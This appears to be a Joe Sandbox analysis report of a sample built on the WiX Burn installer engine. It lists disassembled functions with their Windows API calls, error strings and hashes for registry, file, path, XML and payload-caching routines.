                                                                                                                                                                  • Failed to open registry key. Key = '%ls', xrefs: 0092131B
                                                                                                                                                                  • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0092144A
                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 00921346
                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 009213F8
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 0092132D, 009213D2, 009213D7, 009213EF, 00921436
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                  • API String ID: 3535843008-2242727714
                                                                                                                                                                  • Opcode ID: 562591255bfd7c2b10c8a409d28dbc36a4bfd55fe7d854f177515bd0c1050c00
                                                                                                                                                                  • Instruction ID: c3bdb4df7ed5f7cca88eb89f8b557cc9d9a7a496c9900dcf157d3ab7baf4b1ce
                                                                                                                                                                  • Opcode Fuzzy Hash: 562591255bfd7c2b10c8a409d28dbc36a4bfd55fe7d854f177515bd0c1050c00
                                                                                                                                                                  • Instruction Fuzzy Hash: FF512932B40639BBEB227A90DC07FAE7A2DEF14B14F114164BA04795E1D3B19E6097D1
                                                                                                                                                                  Function 0097A73B Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 153COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097A8B1
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097A8C0
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097A8CF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get unknown attribute value., xrefs: 0097A854
                                                                                                                                                                  • Failed to allocate unknown attribute., xrefs: 0097A774
                                                                                                                                                                  • Failed to allocate ATOM unknown attribute name., xrefs: 0097A833
                                                                                                                                                                  • Failed to get unknown attribute namespace., xrefs: 0097A7E0
                                                                                                                                                                  • Failed to get unknown attribute name., xrefs: 0097A80E
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0097A763, 0097A76E, 0097A783, 0097A7CE
                                                                                                                                                                  • Failed to allocate ATOM unknown attribute value., xrefs: 0097A87C
                                                                                                                                                                  • Failed to allocate ATOM unknown attribute namespace., xrefs: 0097A7BF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                  • String ID: Failed to allocate ATOM unknown attribute name.$Failed to allocate ATOM unknown attribute namespace.$Failed to allocate ATOM unknown attribute value.$Failed to allocate unknown attribute.$Failed to get unknown attribute name.$Failed to get unknown attribute namespace.$Failed to get unknown attribute value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                  • API String ID: 2724874077-797782994
                                                                                                                                                                  • Opcode ID: 167475b9ed9253e8a1fbfac674c56292b63cbf306c66ca3b15698a93dcb63fcf
                                                                                                                                                                  • Instruction ID: e07d2b0981eedac22c424d707fcd21fd4dfec3168797d2183c98eaed59ae42a9
                                                                                                                                                                  • Opcode Fuzzy Hash: 167475b9ed9253e8a1fbfac674c56292b63cbf306c66ca3b15698a93dcb63fcf
                                                                                                                                                                  • Instruction Fuzzy Hash: 7941FC72F80329FBEB255B508C4AFAF7B789B81B14F018060FB09BB1D1E6749D419691
                                                                                                                                                                  Function 00977CA4 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 140fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00977D2E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00977D3B
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00977D92
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00977DC6
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp), ref: 00977E18
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                  • String ID: %ls.R$Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to create resume path.$Failed to read resume file: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 3160720760-2159331624
                                                                                                                                                                  • Opcode ID: 429e7340fc0b77fc885cc5a6c4b17c851e081632c8a4702c7ba022c775d3cad4
                                                                                                                                                                  • Instruction ID: d13d136d9c47c2421bf1989be44b356690a8f25f9f477d643ac5d7e445cd34a7
                                                                                                                                                                  • Opcode Fuzzy Hash: 429e7340fc0b77fc885cc5a6c4b17c851e081632c8a4702c7ba022c775d3cad4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F41FC73A452257BE7315BD4CC4AFAABA68AF85721F118155FE18FF2D1E2B09C00C6A0
                                                                                                                                                                  Function 0097234B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 138COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemWindowsDirectoryW.KERNEL32(00000000,00000105), ref: 00972390
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00976531,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019), ref: 0097239C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get Windows directory path with default size., xrefs: 009723CC
                                                                                                                                                                  • Failed to terminate Windows directory path with backslash., xrefs: 0097249D
                                                                                                                                                                  • Failed to get Windows directory path with returned size., xrefs: 00972444
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 00972379, 009723C0, 009723C6, 009723D7, 00972439, 0097243E, 009724AC
                                                                                                                                                                  • Failed to concat subdirectory on Windows directory path., xrefs: 00972477
                                                                                                                                                                  • Failed to alloc Windows directory path., xrefs: 0097236A
                                                                                                                                                                  • Failed to realloc Windows directory path., xrefs: 009723F2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryErrorLastSystemWindows
                                                                                                                                                                  • String ID: Failed to alloc Windows directory path.$Failed to concat subdirectory on Windows directory path.$Failed to get Windows directory path with default size.$Failed to get Windows directory path with returned size.$Failed to realloc Windows directory path.$Failed to terminate Windows directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                  • API String ID: 505562763-519864416
                                                                                                                                                                  • Opcode ID: 920eb67fb68805f2b698f2976ec26197acbd9d9f13f02e04aa1d72e57b0d793b
                                                                                                                                                                  • Instruction ID: cdcb86e9c105b7bfe1407639900f0769ee05f599a00db292d3733aa83103449e
                                                                                                                                                                  • Opcode Fuzzy Hash: 920eb67fb68805f2b698f2976ec26197acbd9d9f13f02e04aa1d72e57b0d793b
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A410933AA0739B7D72257549C4AFAF296CDB85F54F128120FD48BB291E7B89D0056E0
                                                                                                                                                                  Function 0092E314 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 137fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092E331
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092E341
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0092E48D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$Payload has no verification information: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-3234199796
                                                                                                                                                                  • Opcode ID: 6c69cee4f84f992b614e0cd179ae6b249e97310982f8f0c9555c79e440fd5fc7
                                                                                                                                                                  • Instruction ID: bc4da3beed9f5d248e8fda5ee2af8e963cd4ffd5338fdfd72d9ca22272463e3f
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c69cee4f84f992b614e0cd179ae6b249e97310982f8f0c9555c79e440fd5fc7
                                                                                                                                                                  • Instruction Fuzzy Hash: 1641C032680225BBEF236E54DC4AFAF3E29EF49B14F154114FF147A2E5D2B6C8209761
                                                                                                                                                                  Function 00914A25 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 130COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemWow64DirectoryW.KERNEL32(?,00000105,?,00000105), ref: 00914A67
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00914A73
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00914A97, 00914A9D, 00914AAE, 00914B33, 00914B38, 00914B74
                                                                                                                                                                  • Failed to allocate space for system wow64 directory., xrefs: 00914AC9
                                                                                                                                                                  • Failed to realloc system wow64 directory path., xrefs: 00914AF0
                                                                                                                                                                  • Failed to get max length of input buffer., xrefs: 00914A4A
                                                                                                                                                                  • Failed to get system wow64 directory path with returned size., xrefs: 00914B3E
                                                                                                                                                                  • Failed to terminate system wow64 directory path with backslash., xrefs: 00914B65
                                                                                                                                                                  • Failed to get system wow64 directory path with default size., xrefs: 00914AA3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryErrorLastSystemWow64
                                                                                                                                                                  • String ID: Failed to allocate space for system wow64 directory.$Failed to get max length of input buffer.$Failed to get system wow64 directory path with default size.$Failed to get system wow64 directory path with returned size.$Failed to realloc system wow64 directory path.$Failed to terminate system wow64 directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                  • API String ID: 1255099494-3047029672
                                                                                                                                                                  • Opcode ID: 2788b4a0dd242e9633fa0e7d44ac841c8d147e6c1138bc3517d6ebf5dc0fe64c
                                                                                                                                                                  • Instruction ID: 3e51a84886e10ca720a1aab942a7722327de94eaee83de6bde14fd1635e7ec79
                                                                                                                                                                  • Opcode Fuzzy Hash: 2788b4a0dd242e9633fa0e7d44ac841c8d147e6c1138bc3517d6ebf5dc0fe64c
                                                                                                                                                                  • Instruction Fuzzy Hash: D231F373BC473D73D72256558C4AFAF696CDF89B61F124120BA04BF2C1E2A4DD8082E9
                                                                                                                                                                  Function 009148C2 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 128COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00914904
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009118D8,?,?,00000000,?,?,?,009118B7,?,?,00000000,00000000), ref: 00914910
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00914934, 0091493A, 0091494B, 009149CF, 009149D4, 00914A0F
                                                                                                                                                                  • Failed to allocate space for system directory., xrefs: 00914966
                                                                                                                                                                  • Failed to realloc system directory path., xrefs: 0091498C
                                                                                                                                                                  • Failed to get max length of input buffer., xrefs: 009148E7
                                                                                                                                                                  • Failed to get system directory path with default size., xrefs: 00914940
                                                                                                                                                                  • Failed to terminate system directory path with backslash., xrefs: 00914A00
                                                                                                                                                                  • Failed to get system directory path with returned size., xrefs: 009149DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryErrorLastSystem
                                                                                                                                                                  • String ID: Failed to allocate space for system directory.$Failed to get max length of input buffer.$Failed to get system directory path with default size.$Failed to get system directory path with returned size.$Failed to realloc system directory path.$Failed to terminate system directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                  • API String ID: 3081803543-4099084807
                                                                                                                                                                  • Opcode ID: 1e65c571345b2accfe2edda746942fe068a279a1f7b8adf90a076b9270159cb4
                                                                                                                                                                  • Instruction ID: eb511b9a226034a57c49149bd7f1015f4859aa5e0d9769ef2aad47a6bf300bed
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e65c571345b2accfe2edda746942fe068a279a1f7b8adf90a076b9270159cb4
                                                                                                                                                                  • Instruction Fuzzy Hash: 7331E373B8072D77E73156548C8AFEF696CDB48F64F124125BE04BB2C1E6A49C8086E4
                                                                                                                                                                  Function 0093D72B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 111threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetProcessShutdownParameters.KERNEL32(000003FF,00000000,?,00000000,?,?,?,?,00000000,00000001), ref: 0093D74C
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0093D757
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0093D764
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0093D370,?,00000000,00000000), ref: 0093D7CC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0093D7D9
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF), ref: 0093D81F
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0093D838
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0093D849
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsParametersProcessShutdownThreadWait
                                                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$d:\a\wix4\wix4\src\burn\engine\uithread.cpp
                                                                                                                                                                  • API String ID: 665835008-3306212416
                                                                                                                                                                  • Opcode ID: 8419d5ea885c025ca2c3ab2660611edd5a5fca3c1fa836b56ceb11a034624600
                                                                                                                                                                  • Instruction ID: a3b2008b90e0d2d19602755c6c7a6df8a6e0f6c92e0ea31457407a4d730720a0
                                                                                                                                                                  • Opcode Fuzzy Hash: 8419d5ea885c025ca2c3ab2660611edd5a5fca3c1fa836b56ceb11a034624600
                                                                                                                                                                  • Instruction Fuzzy Hash: F531E9B6D01215BBD7119F989C89FAFBABCAB08750F104065B915F7280D6709E408AA1
                                                                                                                                                                  Function 0091B5CF Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 211COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,8000FFFF,0097E7E8,00000000,00000000,00000000,00000000,8000FFFF,?,8000FFFF,8000FFFF,00916DA2), ref: 0091B5E6
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0091B83F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write variable value as number., xrefs: 0091B7A0
                                                                                                                                                                  • Failed to get string., xrefs: 0091B7DC
                                                                                                                                                                  • Failed to write variable name., xrefs: 0091B804
                                                                                                                                                                  • Unsupported variable type., xrefs: 0091B784
                                                                                                                                                                  • Failed to write variable value as string., xrefs: 0091B7C8
                                                                                                                                                                  • Failed to write included flag., xrefs: 0091B818
                                                                                                                                                                  • Failed to get numeric., xrefs: 0091B7B4
                                                                                                                                                                  • Failed to write variable count., xrefs: 0091B603
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091B615, 0091B82A
                                                                                                                                                                  • Failed to write variable value type., xrefs: 0091B7F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get numeric.$Failed to get string.$Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-3226335872
                                                                                                                                                                  • Opcode ID: 820a249a5dc44aafa84cdf58e3435ebc041c6326e99632c8110591085549f43d
                                                                                                                                                                  • Instruction ID: 4a957a64b6a9c5a94884560f6a3b12495a2cb71505e90e5ef80732eefd25f95a
                                                                                                                                                                  • Opcode Fuzzy Hash: 820a249a5dc44aafa84cdf58e3435ebc041c6326e99632c8110591085549f43d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6761C131B4031DBBDB229E54CC4AFDE7A69FF44B64F104150FA01BA2D1D3B1DA909B91
                                                                                                                                                                  Function 009707B7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 192memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$AllocClearInitString
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed put_preserveWhiteSpace$failed put_resolveExternals$failed put_validateOnParse$failed to allocate bstr for Path in XmlLoadDocumentFromFileEx$failed to load XML from: %ls
                                                                                                                                                                  • API String ID: 2213243845-3558707546
                                                                                                                                                                  • Opcode ID: 511ec4515e5254e9b60e6bbaf2ff4f9cb436d943a95b208891a16a4666608e07
                                                                                                                                                                  • Instruction ID: 7908328294e2063f5bafd9ebb89b8ab8fe243396540c0b4a03cdac35bc831e1f
                                                                                                                                                                  • Opcode Fuzzy Hash: 511ec4515e5254e9b60e6bbaf2ff4f9cb436d943a95b208891a16a4666608e07
                                                                                                                                                                  • Instruction Fuzzy Hash: D6512932B40725FBEB119B54CC46F9E77A9AFC9B10F0580A5F908FF281DAB099408B91
                                                                                                                                                                  Function 009750E2 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 187registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00974F04: lstrlenW.KERNEL32(00917162,00916DEA,?,?,?,00975488,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817), ref: 00974F2A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,00916CF2,00000000,00000000,00000000), ref: 009752A2
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,00916CF2,00000000,00000000,00000000), ref: 009752B5
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open the registry key "%ls". The dependency store is corrupt., xrefs: 0097516F
                                                                                                                                                                  • Failed to get the name of the dependent from the key "%ls"., xrefs: 009752EB
                                                                                                                                                                  • Failed to open the registry key for dependents of "%ls"., xrefs: 009751C4
                                                                                                                                                                  • Failed to check the dictionary of ignored dependents., xrefs: 00975210
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00975121, 0097521F, 0097530E
                                                                                                                                                                  • Failed to allocate the registry key for dependency "%ls"., xrefs: 00975112
                                                                                                                                                                  • Failed to add the dependent key "%ls" to the string array., xrefs: 009752D7
